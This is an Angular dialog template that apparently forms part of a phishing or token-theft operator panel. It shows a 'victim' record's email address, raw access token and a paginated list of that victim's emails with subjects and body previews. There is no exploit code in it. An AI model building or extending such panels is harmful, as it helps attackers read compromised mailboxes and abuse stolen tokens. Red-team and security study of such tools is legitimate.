<h1 mat-dialog-title>{{victim.email}}</h1>
<div mat-dialog-content>
  <mat-tab-group>
    <mat-tab label="{{'details' | translate}}">

      <mat-card class="example-card">
        <mat-card-header>
          <div mat-card-avatar class="example-header-image"></div>
          <mat-card-title>
            {{victim.email}}
          </mat-card-title>
          <mat-card-subtitle>
            Creado el: {{victim.creationDate | date: 'dd/MM/yyyy HH:mm a'}}
          </mat-card-subtitle>
          <mat-card-subtitle>
            Última edición: {{victim.editionDate | date: 'dd/MM/yyyy HH:mm a'}}
          </mat-card-subtitle>
        </mat-card-header>
        <mat-card-content>
          <p>
            {{victim.accessToken}}
          </p>
        </mat-card-content>
        <!--
        <mat-card-actions>
          <button mat-button>LIKE</button>
          <button mat-button>SHARE</button>
        </mat-card-actions>
        -->
      </mat-card>

    </mat-tab>
    <mat-tab label="{{'email' | translate}}">

      <div class="table-container mat-elevation-z8">
        <table mat-table [dataSource]="dataSource">
    
          <ng-container matColumnDef="createdDateTime">
            <th mat-header-cell *matHeaderCellDef> {{'creationDate' | translate}} </th>
            <td mat-cell *matCellDef="let element"> {{element.createdDateTime}} </td>
          </ng-container>
    
          <ng-container matColumnDef="subject">
            <th mat-header-cell *matHeaderCellDef> {{'subject' | translate}} </th>
            <td mat-cell *matCellDef="let element"> {{element.subject}} </td>
          </ng-container>
    
          <ng-container matColumnDef="bodyPreview">
            <th mat-header-cell *matHeaderCellDef> {{'body' | translate}} </th>
            <td mat-cell *matCellDef="let element"> {{element.bodyPreview}} </td>
          </ng-container>
        
          <tr mat-header-row *matHeaderRowDef="displayedColumns"></tr>
          <tr mat-row *matRowDef="let row; columns: displayedColumns;"></tr>
        </table>
    
        <mat-paginator [pageSizeOptions]="[5, 10, 20]" showFirstLastButtons></mat-paginator>
    </div>

    </mat-tab>
  </mat-tab-group>  
</div>
<div mat-dialog-actions>
  <button mat-button (click)="onNoClick()"></button>
  <!--<button mat-button [mat-dialog-close]="data.animal" cdkFocusInitial>Ok</button>-->
</div>
